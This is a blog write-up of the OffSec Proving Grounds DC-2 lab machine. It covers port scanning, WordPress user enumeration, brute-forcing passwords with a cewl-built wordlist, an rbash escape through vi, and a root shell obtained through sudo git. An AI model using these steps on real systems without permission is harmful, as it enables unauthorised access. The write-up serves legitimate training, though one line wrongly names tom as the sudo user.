| title | layout | date | tag | writeups | hidden | author | description | ||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Proving grounds Play: DC-2 |
post |
2023-09-06 01:00 |
|
true |
true |
Naveen |
Offsec proving grounds play linux machine writeup |
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52517b6e70a4337ad24be10b5a0f9ed7 (DSA)
| 2048 5911d8af38518f41a744b32803809942 (RSA)
| 256 df181d7426cec14f6f2fc12654315191 (ECDSA)
|_ 256 d9385f997c0d647e1d46f6e97cc63717 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelmake entry in the /etc/hosts file as dc-2 for the attacking machine IP.
Techstack
- Wordpress
wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u
Usernames Enumerated
admin
jerry
tom
As shown in the webpage the wordslist has to be created using the tool named cewl
cewl http://dc-2/ > passwordwpscan --url http://dc-2/ -U users -P passwordCredentials Obtained
SSH to the machine using the credentials. The user jerry doesn't have SSH login permission, so login to user tom.
vi
:set shell=/bin/bash
:shellType the above commmands to escape from the rbash to standard unix shell.
User tom may not run anything as sudo on machine DC-2. So switch to user jerry.
User tom can run /usr/bin/git as sudo.
Search for exploit on GTFO Bins. As per the page the binary can be used to elevate sudo permissions using below commands.
sudo git -p help config
# Once the git manual page appears type the below and hit enter
!/bin/bashRoot Shell Obtained
Thanks for reading!
For more insights and updates, follow me on Twitter: @thevillagehacker.